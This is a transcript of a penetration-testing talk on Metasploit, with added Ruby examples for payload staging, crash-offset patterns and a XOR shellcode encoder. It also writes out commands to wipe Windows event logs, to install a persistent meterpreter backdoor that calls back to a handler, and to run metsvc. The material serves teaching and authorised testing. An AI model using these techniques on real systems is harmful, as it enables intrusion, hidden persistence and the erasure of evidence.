nethemba metasploit
TRANSCRIPT
www.nethemba.com
Exploitation with Metasploit
Nethemba s.r.o.
Norbert Szetei, CEH [email protected]
Prologue
● Metasploit Project
● Metasploit Framework: open-source platform for developing, testing and using exploit code
● Metasploit Express, Metasploit Pro, NeXpose
What else?
● Passive or active exploits
● Linux / Mac OS X / Windows / IRIX / HP-UX / Solaris
● IPS/IDS testing
● Different communication channels
History of Metasploit
● 1.0 (2003-2004): Perl, 15 exploits, project started by HD Moore
● 2.7 (2003-2006): Perl, more than 150 exploits
● 3.+ (2007-today): Ruby, 628 exploits
● Currently 18 active developers
● Code contributions from hundreds of people
Fundamental Parts
● Interfaces (Console, CLI, ...)
● Libraries (Rex, MSF Core, MSF Base)
● Plugins (db support, wmap, xmlrpc, ...)
● Tools (mostly external usage)
● Modules (Exploits, Auxiliaries, Payloads, Encoders, Nops)
Metasploit testing environment
● Virtual machines laboratory
● Metasploitable
● Remove your Windows updates
● Hacking the web browsers
● Become a hac.. penetration tester
Simple Usage
● exploits (check), auxiliaries
● payloads (singles, stagers, stages)
● portscan, db_autopwn
● generating payloads
● meterpreter, vncinject (full control over the user's session)
● msfencode, msfpayload
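The difference between a single and a staged payload is easiest to see on the wire. The following is an added example, not code from the slides or from the Metasploit code base: a minimal model of reverse_tcp staging, where the stager only knows how to connect back and read a length-prefixed blob, and the handler sends the stage (meterpreter, vncinject, ...) after the connection arrives. It assumes the Windows reverse_tcp framing (4-byte little-endian length followed by the stage bytes); the stage itself is a constructed byte string and `demo_staging`, `serve_stage` and `fetch_stage` are names chosen here, not framework APIs.

```ruby
# Added example (not from the Nethemba slides or Metasploit itself):
# a loopback model of reverse_tcp staging. The handler side plays the role
# of exploit/multi/handler, the stager side plays the tiny connect-back stub.
require 'socket'

# Handler side. Windows reverse_tcp stagers expect a 4-byte little-endian
# length in front of the stage (assumption stated in the lead-in).
def frame_stage(stage)
  [stage.bytesize].pack('V') + stage
end

def serve_stage(server, stage)
  client = server.accept          # the stager connects back to us
  client.write(frame_stage(stage))
  client.close
end

# Stager side. The real stager is position-independent machine code that
# allocates RWX memory and jumps into it; here it just returns the bytes.
MAX_STAGE = 16 * 1024 * 1024      # sanity cap, an assumption for this demo

def read_exact(sock, n)
  buf = ''.b
  while buf.bytesize < n
    chunk = sock.read(n - buf.bytesize)
    raise IOError, 'connection closed mid-stage' if chunk.nil? || chunk.empty?
    buf << chunk
  end
  buf
end

def fetch_stage(host, port)
  sock = TCPSocket.new(host, port)
  len = read_exact(sock, 4).unpack1('V')
  raise "stage length #{len} exceeds cap" if len > MAX_STAGE
  stage = read_exact(sock, len)
  sock.close
  stage
end

# Runs one complete exchange on loopback and returns what the stager received.
def demo_staging(stage)
  server = TCPServer.new('127.0.0.1', 0)   # ephemeral port, loopback only
  port = server.addr[1]
  handler = Thread.new { serve_stage(server, stage) }
  received = fetch_stage('127.0.0.1', port)
  handler.join
  server.close
  received
end

if __FILE__ == $0
  stage = ("\x90" * 16 + 'METERPRETER-STAGE').b   # constructed stand-in for a real stage
  got = demo_staging(stage)
  puts "stager received #{got.bytesize} bytes, intact: #{got == stage}"
end
```

The point for a tester is that the stager carries no exploit logic of its own: whatever the handler serves is what runs, which is why the same small stager can deliver meterpreter, vncinject or a shell, and why a handler that is not listening leaves the stager hanging on the length read.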
Meterpreter
● Injected as a DLL into a host process
● Reverse connections
● Core commands
● Stdapi commands
● Priv commands
Meterpreter STDAPI
● File system commands
● Networking commands
● System commands
● User interface commands
● Keylogging
Meterpreter Priv
● System elevation (the getsystem techniques):
  - Named pipe impersonation
  - Token duplication
  - KiTrap0D
● hashdump
● timestomp (MACE: Modified, Accessed, Created and MFT Entry-modified timestamps)
Can a firewall protect us?
● Attacks on layer 7
● Botnets
● Social engineering + phishing (SET)
● PassiveX
● IDS detection defeated by SSL-encrypted channels
PassiveX
● Modifies the Windows registry to permit loading untrusted ActiveX controls
● Loads the stage ActiveX control from the MSF web server
● Loads stagers (Meterpreter, VNC) via an HTTP tunnel
● Unfortunately it works in IE6 only
Reflective DLL Injection
● Loading of a library from memory into a host process
● The library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader
● Minimal interaction with the host system and process
● The DLL is difficult to detect: it is never written to disk and never registered with the Windows loader
Integration with third party apps
● Nessus
● NeXpose
● WMAP web scanner (Ratproxy)
● Karmetasploit (Aircrack)
Exploit development
● pattern_create.rb, pattern_offset.rb
● porting exploits
● SEH exploitation, msfpescan
● msfelfscan, msfmachscan
● irb; the framework as a base for exploit development
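pattern_create.rb and pattern_offset.rb are the two tools that turn "the program crashed" into "the return address is overwritten at offset N". The block below is an added example, not code from the slides or the Metasploit source: a re-implementation of the cyclic pattern and the offset search, so the step can be followed offline. The crash value used at the bottom is constructed, not taken from a real target.

```ruby
# Added example (not from the slides or from Metasploit): the cyclic pattern
# behind pattern_create.rb and the lookup behind pattern_offset.rb.
SETS = [('A'..'Z').to_a, ('a'..'z').to_a, ('0'..'9').to_a].freeze

# Each 3-byte triplet (upper, lower, digit) is unique until the cycle of
# 26 * 26 * 10 triplets repeats (20280 bytes), so any 4-byte window that
# lands in a register identifies exactly one offset within that range.
def pattern_create(length)
  buf = ''.b
  ctr = [0, 0, 0]
  while buf.bytesize < length
    buf << SETS[0][ctr[0]] << SETS[1][ctr[1]] << SETS[2][ctr[2]]
    # advance like an odometer, digit fastest
    ctr[2] += 1
    if ctr[2] == SETS[2].size
      ctr[2] = 0
      ctr[1] += 1
      if ctr[1] == SETS[1].size
        ctr[1] = 0
        ctr[0] = (ctr[0] + 1) % SETS[0].size
      end
    end
  end
  buf[0, length]
end

# value: the crashed 32-bit register as read in the debugger (Integer), or a
# raw substring. A register holds the pattern bytes little-endian, so an
# Integer is packed with 'V' before searching. Returns nil when the value
# did not come from the pattern (e.g. EIP was clobbered by something else).
def pattern_offset(pattern, value)
  needle = value.is_a?(Integer) ? [value].pack('V') : value.b
  pattern.index(needle)
end

if __FILE__ == $0
  pat = pattern_create(5000)
  crash_eip = 0x41306241            # constructed: EIP reading "Ab0A" in memory
  puts "Exact match at offset #{pattern_offset(pat, crash_eip)}"   # 30
end
```

Two practical checks follow from the code: a pattern longer than 20280 bytes repeats, so a match in a huge buffer is ambiguous, and a nil result usually means the register was not overwritten directly by the buffer (a pointer to it, a partial overwrite, or a different copy), which is exactly the case where msfpescan and an SEH chain inspection come in.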
Exploitation on the Client Side
● Binary payloads
● Trojan infection
● PDF
● Java applet
● VBScript
● Antivirus bypass
msfencode
● msfpayload for raw payload generation
● msfencode -x: specify an alternate win32 executable template
● Injection into an existing executable that keeps its original functionality (-k, used together with -x)
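What msfencode actually does to a raw payload is easy to lose behind the command line, so here is an added example (not code from the slides or from Metasploit's encoder modules) of the simplest member of the family: a single-byte XOR encoder with a hand-assembled x86 decoder stub. The key is chosen so that neither the key nor any encoded byte falls in the caller's bad-character set, and the whole output (stub included) is checked, since the stub embeds the length and the key. The function names, the 32-bit-only stub and the 255-byte limit of its `mov cl` loop counter are assumptions of this example; the sample payload is constructed bytes, not real shellcode.

```ruby
# Added example (not from the slides or the Metasploit encoders): a one-byte
# XOR encoder with bad-character avoidance and an x86 call/pop decoder stub.

def xor_bytes(data, key)
  data.bytes.map { |b| b ^ key }.pack('C*')
end

# Hand-assembled 32-bit x86 decoder, 21 bytes, followed by the encoded payload:
#   00: EB 0E              jmp short call_decoder
#   02: 5E                 decoder: pop esi         ; esi -> encoded payload
#   03: 31 C9              xor ecx, ecx
#   05: B1 <len>           mov cl, len
#   07: 80 74 0E FF <key>  decode: xor byte [esi+ecx-1], key
#   0C: E2 F9              loop decode
#   0E: FF E6              jmp esi                  ; run the decoded payload
#   10: E8 ED FF FF FF     call_decoder: call decoder
#   15: <encoded payload>
STUB_SIZE = 21

def decoder_stub(len, key)
  raise ArgumentError, 'payload must be 1..255 bytes for a mov cl counter' unless (1..255).cover?(len)
  [0xEB, 0x0E, 0x5E, 0x31, 0xC9, 0xB1, len,
   0x80, 0x74, 0x0E, 0xFF, key, 0xE2, 0xF9, 0xFF, 0xE6,
   0xE8, 0xED, 0xFF, 0xFF, 0xFF].pack('C*')
end

def contains_bad?(data, badchars)
  !(data.bytes & badchars.bytes).empty?
end

# Returns [stub + encoded payload, key]. If the length byte itself is a bad
# character, the payload is padded with up to max_pad trailing NOPs (0x90)
# so that a different length can be tried. Raises when no key works, which
# happens when a fixed stub byte (0x0E, 0xFF, ...) is on the bad list.
def xor_encode(payload, badchars, max_pad: 3)
  (0..max_pad).each do |pad|
    padded = payload.b + ("\x90" * pad).b
    (1..255).each do |key|
      blob = decoder_stub(padded.bytesize, key) + xor_bytes(padded, key)
      return [blob, key] unless contains_bad?(blob, badchars)
    end
  end
  raise 'no single-byte XOR key avoids the bad characters'
end

# Inverse of the stub's loop, so the result can be checked without running it.
def xor_decode(blob, key)
  xor_bytes(blob[STUB_SIZE..-1], key)
end

if __FILE__ == $0
  payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x0a\x00\xcc".b   # constructed, contains \x00 and \x0a
  blob, key = xor_encode(payload, "\x00\x0a\x0d".b)
  puts format('key=0x%02x blob=%s', key, blob.unpack1('H*'))
end
```

This is also why "antivirus bypass" by re-encoding has limits: the decoder stub is constant for a given encoder, so signatures are written against the stub rather than the payload, and anything that executes the blob (or emulates it, as modern engines do) sees the original bytes again. Encoding solves the bad-character problem; it is not a reliable evasion technique on its own.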
Post Exploitation
● PSExec (windows/smb/psexec)
● Covering your tracks (event logs), from a Meterpreter Ruby script:
    log = client.sys.eventlog.open('system')   # open the System log through the Meterpreter API
    log.clear                                   # wipe it; 'application' and 'security' work the same way
  Note that clearing leaves a trace of its own: wiping the Security log records event 1102 in it, and wiping the System or Application log records event 104 in the System log.
● Sniffing (meterpreter, auxiliaries)
Maintaining access
● Persistent Meterpreter service:
    run persistence -X -i 15 -p 3443 -r 192.168.64.3
  (-X: start when the system boots, -i: seconds between connection attempts, -p and -r: port and address of the listening handler)
● Meterpreter backdoor service:
    run metsvc -h
Epilogue
If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology. (Bruce Schneier)
References
● http://www.metasploit.com
● http://www.offensive-security.com/
● svn co https://www.metasploit.com/svn/framework3/trunk/
Any questions?
Thank you for listening
Norbert Szetei, CEH